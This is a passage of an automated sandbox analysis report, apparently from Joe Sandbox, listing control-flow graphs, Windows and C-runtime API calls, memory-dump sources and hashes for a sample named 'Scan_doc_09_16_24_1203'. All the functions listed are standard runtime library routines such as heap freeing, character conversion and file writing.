                                                                                                                                                                                                                    • Part of subcall function 005E6078: _free.LIBCMT ref: 005E60A7
                                                                                                                                                                                                                    • Part of subcall function 005E6078: _free.LIBCMT ref: 005E60B9
                                                                                                                                                                                                                    • Part of subcall function 005E6078: _free.LIBCMT ref: 005E60CB
                                                                                                                                                                                                                    • Part of subcall function 005E6078: _free.LIBCMT ref: 005E60DD
                                                                                                                                                                                                                    • Part of subcall function 005E6078: _free.LIBCMT ref: 005E60EF
                                                                                                                                                                                                                    • Part of subcall function 005E6078: _free.LIBCMT ref: 005E6101
                                                                                                                                                                                                                    • Part of subcall function 005E6078: _free.LIBCMT ref: 005E6113
                                                                                                                                                                                                                    • Part of subcall function 005E6078: _free.LIBCMT ref: 005E6125
                                                                                                                                                                                                                    • Part of subcall function 005E6078: _free.LIBCMT ref: 005E6137
                                                                                                                                                                                                                    • Part of subcall function 005E6078: _free.LIBCMT ref: 005E6149
                                                                                                                                                                                                                    • Part of subcall function 005E6078: _free.LIBCMT ref: 005E615B
                                                                                                                                                                                                                    • Part of subcall function 005E6078: _free.LIBCMT ref: 005E616D
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E6540
                                                                                                                                                                                                                    • Part of subcall function 005E4869: HeapFree.KERNEL32(00000000,00000000,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?), ref: 005E487F
                                                                                                                                                                                                                    • Part of subcall function 005E4869: GetLastError.KERNEL32(?,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?,?), ref: 005E4891
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E6562
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E6577
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E6582
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E65A4
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E65B7
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E65C5
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E65D0
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E6608
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E660F
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E662C
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E6644
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                  • Opcode ID: 39056a3554606b8102f2b31b0a266991fc6044bd9305ab6255543d4fda9668bb
                                                                                                                                                                                                                  • Instruction ID: 8c6a921def2c9b5cdf25026bf09b742dd40a6d29edd79f530f2bb9335384775e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39056a3554606b8102f2b31b0a266991fc6044bd9305ab6255543d4fda9668bb
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD315B72604386DFEB28AA7BD849B667BE8BF903D0F54446AE0C9D7191DE31AC40CB51

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 138 5e4330-5e4341 139 5e434d-5e43d8 call 5e4869 * 9 call 5e41f6 call 5e4246 138->139 140 5e4343-5e434c call 5e4869 138->140 140->139
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E4344
                                                                                                                                                                                                                    • Part of subcall function 005E4869: HeapFree.KERNEL32(00000000,00000000,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?), ref: 005E487F
                                                                                                                                                                                                                    • Part of subcall function 005E4869: GetLastError.KERNEL32(?,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?,?), ref: 005E4891
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E4350
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E435B
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E4366
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E4371
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E437C
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E4387
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E4392
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E439D
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E43AB
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                  • Opcode ID: fb2c37c0361dbd01888cc5ba80ab10f3a9f7d1c33b1d2b6b4de398957a145008
                                                                                                                                                                                                                  • Instruction ID: 61c163037def37bdbdd4faaae74d2c4ffd025f769c591aa62585da5ee8093ccf
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb2c37c0361dbd01888cc5ba80ab10f3a9f7d1c33b1d2b6b4de398957a145008
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A119376604189EFCB49EF97D846CD93FA5FF84750F1140A2BA488B262DA31DE50DF81

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 165 5e7ab4-5e7acd 166 5e7acf-5e7adf call 5e82cc 165->166 167 5e7ae3-5e7ae8 165->167 166->167 175 5e7ae1 166->175 169 5e7aea-5e7af2 167->169 170 5e7af5-5e7b19 MultiByteToWideChar 167->170 169->170 172 5e7b1f-5e7b2b 170->172 173 5e7cac-5e7cbf call 5e123a 170->173 176 5e7b7f 172->176 177 5e7b2d-5e7b3e 172->177 175->167 179 5e7b81-5e7b83 176->179 180 5e7b5d-5e7b63 177->180 181 5e7b40-5e7b4f call 5eac20 177->181 184 5e7b89-5e7b9c MultiByteToWideChar 179->184 185 5e7ca1 179->185 183 5e7b64 call 5e62ff 180->183 181->185 190 5e7b55-5e7b5b 181->190 187 5e7b69-5e7b6e 183->187 184->185 188 5e7ba2-5e7bbd call 5e5a15 184->188 189 5e7ca3-5e7caa call 5e646a 185->189 187->185 191 5e7b74 187->191 188->185 197 5e7bc3-5e7bca 188->197 189->173 194 5e7b7a-5e7b7d 190->194 191->194 194->179 198 5e7bcc-5e7bd1 197->198 199 5e7c04-5e7c10 197->199 198->189 200 5e7bd7-5e7bd9 198->200 201 5e7c5c 199->201 202 5e7c12-5e7c23 199->202 200->185 203 5e7bdf-5e7bf9 call 5e5a15 200->203 204 5e7c5e-5e7c60 201->204 205 5e7c3e-5e7c44 202->205 206 5e7c25-5e7c34 call 5eac20 202->206 203->189 217 5e7bff 203->217 208 5e7c9a-5e7ca0 call 5e646a 204->208 209 5e7c62-5e7c7b call 5e5a15 204->209 211 5e7c45 call 5e62ff 205->211 206->208 220 5e7c36-5e7c3c 206->220 208->185 209->208 222 5e7c7d-5e7c84 209->222 216 5e7c4a-5e7c4f 211->216 216->208 221 5e7c51 216->221 217->185 223 5e7c57-5e7c5a 220->223 221->223 224 5e7c86-5e7c87 222->224 225 5e7cc0-5e7cc6 222->225 223->204 226 5e7c88-5e7c98 WideCharToMultiByte 224->226 225->226 226->208 227 5e7cc8-5e7ccf call 5e646a 226->227 227->189
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,005E54C8,00000000,?,?,?,005E7D05,?,?,00000100), ref: 005E7B0E
                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 005E7B46
                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,005E7D05,?,?,00000100,5EFC4D8B,?,?), ref: 005E7B94
                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 005E7C2B
                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005E7C8E
                                                                                                                                                                                                                  • __freea.LIBCMT ref: 005E7C9B
                                                                                                                                                                                                                    • Part of subcall function 005E62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,005E7E5B,?,00000000,?,005E686F,?,00000004,00000000,?,?,?,005E3BCD), ref: 005E6331
                                                                                                                                                                                                                  • __freea.LIBCMT ref: 005E7CA4
                                                                                                                                                                                                                  • __freea.LIBCMT ref: 005E7CC9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2597970681-0
                                                                                                                                                                                                                  • Opcode ID: d42186fe7a62222efdfa99cb333f83a617f2923ca3325b5f5d6d98f973ef80f2
                                                                                                                                                                                                                  • Instruction ID: 26404baf18715a71119fd1953e39f7bc31d43c0d08af0540517cf0ee1c748ec8
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d42186fe7a62222efdfa99cb333f83a617f2923ca3325b5f5d6d98f973ef80f2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7451197261064AABDB2C8F66CC85EAF3FAEFB48750B254628FC49D6140EB30DC40D650

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 230 5e8417-5e8474 GetConsoleCP 231 5e847a-5e8496 230->231 232 5e85b7-5e85c9 call 5e123a 230->232 234 5e8498-5e84af 231->234 235 5e84b1-5e84c2 call 5e6052 231->235 237 5e84eb-5e84fa call 5e72b7 234->237 242 5e84e8-5e84ea 235->242 243 5e84c4-5e84c7 235->243 237->232 244 5e8500-5e8520 WideCharToMultiByte 237->244 242->237 245 5e858e-5e85ad 243->245 246 5e84cd-5e84df call 5e72b7 243->246 244->232 247 5e8526-5e853c WriteFile 244->247 245->232 246->232 252 5e84e5-5e84e6 246->252 249 5e853e-5e854f 247->249 250 5e85af-5e85b5 GetLastError 247->250 249->232 253 5e8551-5e8555 249->253 250->232 252->244 254 5e8557-5e8575 WriteFile 253->254 255 5e8583-5e8586 253->255 254->250 256 5e8577-5e857b 254->256 255->231 257 5e858c 255->257 256->232 258 5e857d-5e8580 256->258 257->232 258->255
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,005E8B8C,?,00000000,?,00000000,00000000), ref: 005E8459
                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 005E84D4
                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 005E84EF
                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 005E8515
                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,005E8B8C,00000000,?,?,?,?,?,?,?,?,?,005E8B8C,?), ref: 005E8534
                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,005E8B8C,00000000,?,?,?,?,?,?,?,?,?,005E8B8C,?), ref: 005E856D
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                  • Opcode ID: b146f2e8ca8786b9a3d63ba87d01f7f07932e256deb3fca78fce44aef2992884
                                                                                                                                                                                                                  • Instruction ID: d78b474f0c7cac2c17da80c604a5cfaefd16875a393db08e7f4518cb9e9a83b7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b146f2e8ca8786b9a3d63ba87d01f7f07932e256deb3fca78fce44aef2992884
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F51D370900289AFDB14CFA9D885AFEBFF9FF19300F14455AE595E7291DB309940CB60

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 259 5e1e00-5e1e51 call 5eac80 call 5e1dc0 call 5e2377 266 5e1ead-5e1eb0 259->266 267 5e1e53-5e1e65 259->267 268 5e1eb2-5e1ebf call 5e2360 266->268 269 5e1ed0-5e1ed9 266->269 267->269 270 5e1e67-5e1e7e 267->270 275 5e1ec4-5e1ecd call 5e1dc0 268->275 272 5e1e94 270->272 273 5e1e80-5e1e8e call 5e2300 270->273 274 5e1e97-5e1e9c 272->274 282 5e1ea4-5e1eab 273->282 283 5e1e90 273->283 274->270 277 5e1e9e-5e1ea0 274->277 275->269 277->269 280 5e1ea2 277->280 280->275 282->275 284 5e1eda-5e1ee3 283->284 285 5e1e92 283->285 286 5e1f1d-5e1f2d call 5e2340 284->286 287 5e1ee5-5e1eec 284->287 285->274 293 5e1f2f-5e1f3e call 5e2360 286->293 294 5e1f41-5e1f5d call 5e1dc0 call 5e2320 286->294 287->286 289 5e1eee-5e1efd call 5eaac0 287->289 295 5e1eff-5e1f17 289->295 296 5e1f1a 289->296 293->294 295->296 296->286
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 005E1E37
                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 005E1E3F
                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 005E1EC8
                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 005E1EF3
                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 005E1F48
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                  • Opcode ID: 550df27e87bbe3dd7ed9cdd9c0409d937d4c91b574660e3718d8bacd12153604
                                                                                                                                                                                                                  • Instruction ID: 8c6c9ab05400b67a143a78eadd9a558456f1047350454baa8e33c56abd0e79cf
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 550df27e87bbe3dd7ed9cdd9c0409d937d4c91b574660e3718d8bacd12153604
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D141E334A006899BCF18DF2AC884AAEBFB9BF44364F148455FC559B392D731AD05CF94

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 305 5e621b-5e6226 306 5e62fc-5e62fe 305->306 307 5e622c-5e62f9 call 5e61df * 5 call 5e4869 * 3 call 5e61df * 5 call 5e4869 * 4 305->307 307->306
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 005E61DF: _free.LIBCMT ref: 005E6208
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E6269
                                                                                                                                                                                                                    • Part of subcall function 005E4869: HeapFree.KERNEL32(00000000,00000000,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?), ref: 005E487F
                                                                                                                                                                                                                    • Part of subcall function 005E4869: GetLastError.KERNEL32(?,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?,?), ref: 005E4891
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E6274
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E627F
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E62D3
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E62DE
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E62E9
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E62F4
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                  • Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                  • Instruction ID: 9692c4cff4185e485139860230804b99fe86990455311d28468eb4f7bc03eb15
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB1184B1540BD5AAD629B772CC0FFCB7F9C7F807C1F404824B6DA66093DA65BA04CA51

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 342 5e23d1-5e23d8 343 5e23dd-5e23f8 GetLastError call 5e26a4 342->343 344 5e23da-5e23dc 342->344 347 5e23fa-5e23fc 343->347 348 5e2411-5e2413 343->348 349 5e23fe-5e240f call 5e26df 347->349 350 5e2457-5e2462 SetLastError 347->350 348->350 349->348 353 5e2415-5e2425 call 5e3f67 349->353 356 5e2439-5e2449 call 5e26df 353->356 357 5e2427-5e2437 call 5e26df 353->357 363 5e244f-5e2456 call 5e3ec5 356->363 357->356 362 5e244b-5e244d 357->362 362->363 363->350
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,005E23C8,005E209F,005E1AFC), ref: 005E23DF
                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005E23ED
                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005E2406
                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,005E23C8,005E209F,005E1AFC), ref: 005E2458
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                  • Opcode ID: 0452b368725fe6856df719d3545b055bb0e9074e422e2bc94c972ccf21d3bbff
                                                                                                                                                                                                                  • Instruction ID: 4b0255c0802b4bcccb2a15d373cc4f4a32f9e0887daec55615c8ec2ea42e7856
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0452b368725fe6856df719d3545b055bb0e9074e422e2bc94c972ccf21d3bbff
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F901B5725087E69FAA1C27776C8D5272F5CFB517B5F200339F5A0850ECEF564C45A148

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 366 5e4424-5e4438 GetLastError 367 5e443a-5e4444 call 5e5904 366->367 368 5e4446-5e444b 366->368 367->368 375 5e448f-5e449a SetLastError 367->375 370 5e444d call 5e480c 368->370 372 5e4452-5e4458 370->372 373 5e445a 372->373 374 5e4463-5e4471 call 5e595a 372->374 376 5e445b-5e4461 call 5e4869 373->376 381 5e4476-5e448d call 5e4296 call 5e4869 374->381 382 5e4473-5e4474 374->382 383 5e449b-5e44a7 SetLastError call 5e3f24 376->383 381->375 381->383 382->376
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000008,?,005E6D69,?,?,?,005F04C8,0000002C,005E3F34,00000016,005E209F,005E1AFC), ref: 005E4428
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E445B
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E4483
                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 005E4490
                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 005E449C
                                                                                                                                                                                                                  • _abort.LIBCMT ref: 005E44A2
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                  • Opcode ID: 6a003d5daafedad18e8d471a5cb30da4d3ad17de8b4b7660ab8de87094895e20
                                                                                                                                                                                                                  • Instruction ID: 8a20239b2bebb6fe693f87a2ccdcf98501db058fc7f40533501278f1b8e96d6d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a003d5daafedad18e8d471a5cb30da4d3ad17de8b4b7660ab8de87094895e20
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7F0F432604AC2A7DB1E7737AC4DB2B2E2ABBD1771F204414F6E8D61D1FF2589019925

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 390 5e36fc-5e3724 GetModuleHandleExW 391 5e3749-5e374d 390->391 392 5e3726-5e3739 GetProcAddress 390->392 393 5e374f-5e3752 FreeLibrary 391->393 394 5e3758-5e3765 call 5e123a 391->394 395 5e373b-5e3746 392->395 396 5e3748 392->396 393->394 395->396 396->391
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005E36AD,?,?,005E364D,?,005F02E0,0000000C,005E37A4,?,00000002), ref: 005E371C
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005E372F
                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,005E36AD,?,?,005E364D,?,005F02E0,0000000C,005E37A4,?,00000002,00000000), ref: 005E3752
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
